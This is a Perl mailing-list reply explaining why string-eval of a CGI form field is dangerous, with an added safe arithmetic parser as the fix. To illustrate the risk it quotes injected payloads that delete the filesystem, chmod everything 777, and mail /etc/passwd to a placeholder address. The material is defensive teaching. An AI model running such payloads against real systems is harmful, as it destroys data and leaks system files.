
Re: [MacPerl] Dangerous cgi-script



|Is this this cgi script dangerous?
|[...]
|$math = $FORM{'calc'};
|$res=eval "$math";

Yes! You really never want to do an eval of a user-entered string.
Remember, the string can contain *any Perl script*, including a
system call. On Unix, strings like 'system ("rm -rf /")' or
'system ("find / -print | xargs chmod 777")' or
'system ("mail xxx@yyy.zzz </etc/passwd")' are possibilities. On
the Mac you're more limited, but something like
'open F ">Macintosh HD:System Folder:System"' might work, and be
fairly painful.

Anyway, you get the picture.

Brian
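
The following is an added example, not code from the original post or its author. It shows the string-eval from the quoted script running an attacker-chosen value (a harmless payload constructed here, which sets a variable instead of calling system), and beside it a small hand-written arithmetic parser that does the calculator's job without ever handing the input to the Perl compiler. The grammar (numbers, + - * /, unary minus and parentheses) is an assumption about what the calculator needs; the helper names are made up for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# --- The pattern from the quoted script -----------------------------------
# Constructed "form field": anything the user typed is handed to eval as Perl
# source. This payload is harmless (it sets a global and returns 42), but it
# could just as well be system("rm -rf /").
our $pwned = 0;
my $attack = '$main::pwned = 1; 42';
my $bad = eval "$attack";                     # string eval compiles and runs it
print "string eval returned $bad, pwned=$pwned\n";   # 42, pwned=1

# --- Safe replacement: treat the input as data, never as code ------------
# expr   := term (('+'|'-') term)*
# term   := factor (('*'|'/') factor)*
# factor := NUMBER | '(' expr ')' | '-' factor
# Any other character is rejected before evaluation starts.

sub tokenize {
    my ($src) = @_;
    my @tok;
    pos($src) = 0;
    while (pos($src) < length $src) {
        if    ($src =~ /\G\s+/gc)              { next }
        elsif ($src =~ /\G(\d+(?:\.\d+)?)/gc)  { push @tok, ['num', $1] }
        elsif ($src =~ /\G([-+*\/()])/gc)      { push @tok, ['op',  $1] }
        else  { die "bad character at offset " . pos($src) . "\n" }
    }
    return \@tok;
}

sub safe_calc {
    my ($src) = @_;
    my $tok = tokenize($src);
    my $i   = 0;
    my ($expr, $term, $factor);
    my $peek = sub { $i < @$tok ? $tok->[$i] : undef };
    my $take = sub { $tok->[$i++] };

    $factor = sub {
        my $t = $take->() or die "unexpected end of input\n";
        if ($t->[0] eq 'num') { return $t->[1] + 0 }
        if ($t->[1] eq '-')   { return -$factor->() }
        if ($t->[1] eq '(') {
            my $v = $expr->();
            my $close = $take->();
            die "expected ')'\n" unless $close && $close->[1] eq ')';
            return $v;
        }
        die "unexpected token '$t->[1]'\n";
    };
    $term = sub {
        my $v = $factor->();
        while (my $t = $peek->()) {
            last unless $t->[0] eq 'op' && ($t->[1] eq '*' || $t->[1] eq '/');
            $take->();
            my $r = $factor->();
            if ($t->[1] eq '*') { $v *= $r }
            else { die "division by zero\n" if $r == 0; $v /= $r }
        }
        return $v;
    };
    $expr = sub {
        my $v = $term->();
        while (my $t = $peek->()) {
            last unless $t->[0] eq 'op' && ($t->[1] eq '+' || $t->[1] eq '-');
            $take->();
            my $r = $term->();
            $v = $t->[1] eq '+' ? $v + $r : $v - $r;
        }
        return $v;
    };

    my $result = $expr->();
    die "trailing input\n" if $i < @$tok;
    return $result;
}

# Block eval only traps the die() above; it never compiles the user's string.
for my $input ('2 * (3 + 4) - 10 / 4', $attack, '1 +') {
    my $res = eval { safe_calc($input) };
    print defined $res ? "$input => $res\n" : "$input => rejected: $@";
}
# 2 * (3 + 4) - 10 / 4 => 11.5
# $main::pwned = 1; 42 => rejected: bad character at offset 0
# 1 + => rejected: unexpected end of input
```

Running the CGI under taint checking (perl -T) would also have refused the original line, since Perl treats a string eval of tainted data as an insecure operation; the parser above is still the better fix, because it makes the question of what the input can do answerable by reading thirty lines instead of the whole language.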

***** Want to unsubscribe from this list?
***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch